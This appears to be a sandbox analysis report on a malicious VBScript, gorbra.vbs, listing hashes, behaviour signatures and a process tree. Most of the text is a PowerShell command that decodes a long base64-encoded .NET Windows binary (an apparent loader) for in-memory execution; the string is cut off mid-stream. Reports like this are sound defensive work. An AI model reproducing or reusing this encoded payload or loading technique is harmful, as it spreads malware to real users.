590a2ffe3a7d94ea6f13f48c39affc97790afcad1d1f750144e6319ace0c42a9

General

Target

gorbra.vbs
Size

501KB
MD5

87ee32efbf48d6cd6a12d3de30527bdd
SHA1

b895b0c395ab5484e66472e6ecd6290ff0fca48d
SHA256

590a2ffe3a7d94ea6f13f48c39affc97790afcad1d1f750144e6319ace0c42a9
SHA512

f70c7faed9822656041abe363e774a02dce5f00abe36c0a17e29d898ed4afb7c4eadc56c5f678521de4c864a7d0feb2761f737f76dc0c0c6cbb37e69ba8e02a3
SSDEEP

3072:KRr+dxPr+9gr+Ejr+gMSlctO+Jxq3udcXryOXzRn/u35n5p5XNsn1+7HLDVZcMxz:blRyODRn/umn+AMxzak5

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
916	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	916	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1304 wrote to memory of 916	1304	WScript.exe	27
PID 1304 wrote to memory of 916	1304	WScript.exe	27
PID 1304 wrote to memory of 916	1304	WScript.exe	27

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\gorbra.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1304
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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KgDVAqMA2gIlANoCJQAMAwAAAAAASUVudW1lcmFibGVgMQBDb250ZXh0VmFsdWVgMQBUaHJlYWRTYWZlT2JqZWN0UHJvdmlkZXJgMQBrZXJuZWwzMgBNaWNyb3NvZnQuV2luMzIAVG9VSW50MzIAVG9JbnQzMgAyOWEwN2RmNDA4ODU0NGNkYWNmZWU3ODg4ZGQ2MjBmMgBUb0ludDE2AGdldF9VVEY4ADxNb2R1bGU+AExvYWRMaWJyYXJ5QQBCAEMARABFAEYAVkFJAFN5c3RlbS5JTwBRQlh0WABQcm9qZWN0RGF0YQBtc2NvcmxpYgBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMAUHJvY2Vzc0lkAEdldFByb2Nlc3NCeUlkAGJ5dGVzUmVhZAB0aHJlYWQATG9hZABwYXlsb2FkAFN5bmNocm9uaXplZABOZXdHdWlkAFJlcGxhY2UAQ3JlYXRlSW5zdGFuY2UAZ2V0X0dldEluc3RhbmNlAEFuZGUAR2V0SGFzaENvZGUAQ3J5cHRvU3RyZWFtTW9kZQBDb21wcmVzc2lvbk1vZGUARW5kSW52b2tlAEJlZ2luSW52b2tlAEVudW1lcmFibGUAVGhyZWFkSGFuZGxlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAFByb2Nlc3NIYW5kbGUAaGFuZGxlAEZpbGUAc2V0X1dpbmRvd1N0eWxlAFByb2Nlc3NXaW5kb3dTdHlsZQBnZXRfTmFtZQBzZXRfRmlsZU5hbWUAYXBwbGljYXRpb25OYW1lAEdldERpcmVjdG9yeU5hbWUASG9tZQBjb21tYW5kTGluZQBDb21iaW5lAENoYW5nZVR5cGUAVmFsdWVUeXBlAFNlY3VyaXR5UHJvdG9jb2xUeXBlAEdldFR5cGUAdHlwZQBTeXN0ZW0uQ29yZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQBBcHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAQ2xvc2UAU3RyUmV2ZXJzZQBNdWx0aWNhc3REZWxlZ2F0ZQBEZWxlZ2F0ZUFzeW5jU3RhdGUARWRpdG9yQnJvd3NhYmxlU3RhdGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dlck5vblVzZXJDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUARWRpdG9yQnJvd3NhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBTdGFuZGFyZE1vZHVsZUF0dHJpYnV0ZQBIaWRlTW9kdWxlTmFtZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUARGVidWdnZXJIaWRkZW5BdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBPYmZ1c2NhdGlvbkF0dHJpYnV0ZQBNeUdyb3VwQ29sbGVjdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAFlhbm9BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAEJ5dGUAZ2V0X1ZhbHVlAHNldF9WYWx1ZQBHZXRPYmplY3RWYWx1ZQBTZXRWYW